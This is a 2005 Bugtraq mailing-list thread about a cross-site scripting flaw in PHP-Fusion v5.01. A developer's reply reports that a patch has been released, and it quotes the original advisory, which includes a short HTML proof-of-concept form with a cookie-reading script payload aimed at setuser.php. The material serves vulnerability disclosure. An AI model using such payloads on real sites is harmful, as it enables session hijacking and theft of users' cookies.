Bugtraq mailing list archives
Re: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
From: Sheldon King <sheldon () fileblitz com>
Date: 19 Mar 2005 21:38:51 -0000
In-Reply-To: <20050319082025.28662.qmail () www securityfocus com> The main developer Digitanium was notified, a patch has been developed and released on the main website. Quote from Main Developer Digitanium at http://www.php-fusion.co.uk Pi3cH has reported a cross-site-scripting vulnerability. PHP-Fusion does not properly validate user-supplied input passed by the log-in form in 'user_info_panel.php'. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. It's believed this is related to the new login system I plan to implement officially in v5.02, but have made available as a mod for v5.01. The details are not exact so I have added a security fix to v5.01 to close this vulnerability. I know this is must be annoying for everyone, especially as this is the 3rd security issue inside a month. You must ensure that you update the file fusion_core.php, you can get the very latest file from the service pack which is available from the downloads area. The sourceforge files have also been updated. If you prefer to update manually please click Read More for details. Thanks to Pi3cH for the heads up. End quote Regards Sheldon King PHP Fusion Beta Team
Received: (qmail 6620 invoked from network); 19 Mar 2005 18:05:19 -0000 Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27) by mail.securityfocus.com with SMTP; 19 Mar 2005 18:05:19 -0000 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP id 7C19E237330; Sat, 19 Mar 2005 10:49:48 -0700 (MST) Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com Received: (qmail 3178 invoked from network); 19 Mar 2005 01:01:33 -0000 Date: 19 Mar 2005 08:20:25 -0000 Message-ID: <20050319082025.28662.qmail () www securityfocus com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) From: PersianHacker Team <pi3ch () yahoo com> To: bugtraq () securityfocus com Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability Date: 2005 March Bug Number: 10 PHP-Fusion a light-weight open-source content management system (CMS) written in PHP. It utilises a mySQL database to store your site content and includes a simple, comprehensive adminstration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages More info @: http://php-fusion.co.uk/ Discussion: -------------------- The software does not properly validate user-supplied input in 'setuser.php'. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Exploit: -------------------- <html> <head> <title>PHP-Fusion v5.01 Exploit</title> </head> <body> <h1>PHP-Fusion v5.01 Html Injection Exploit</h1> <form method="POST" action="http://www.example.com/setuser.php"> <b>XSS in register.php:</b><p> Username: <input type="text" name="user_name" size="48" value="XSS Injection Code"></p> <p> Password: <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p> <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br> exmple: <script>document.write(document.cookie)</script></p> <p> <input type='submit' name='login' value='RUN!' class='button'></p> </form> <p> </p> <p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p> </body> </html> Solution: -------------------- No solution was available at the time of this entry. Credit: -------------------- Discovered by PersianHacker.NET Security Team by Pi3cH (pi3ch persianhacker net) http://www.PersianHacker.NET Special Thanks: devil_box(for xss article), amectris, herbod. Help -------------------- visit: http://www.PersianHacker.NET or mail me @: pi3ch persianhacker net
Current thread:
- [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability PersianHacker Team (Mar 19)
- <Possible follow-ups>
- Fw: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability Sheldon King (Mar 21)
- Fw: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability Sheldon King (Mar 21)
- Re: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability Sheldon King (Mar 21)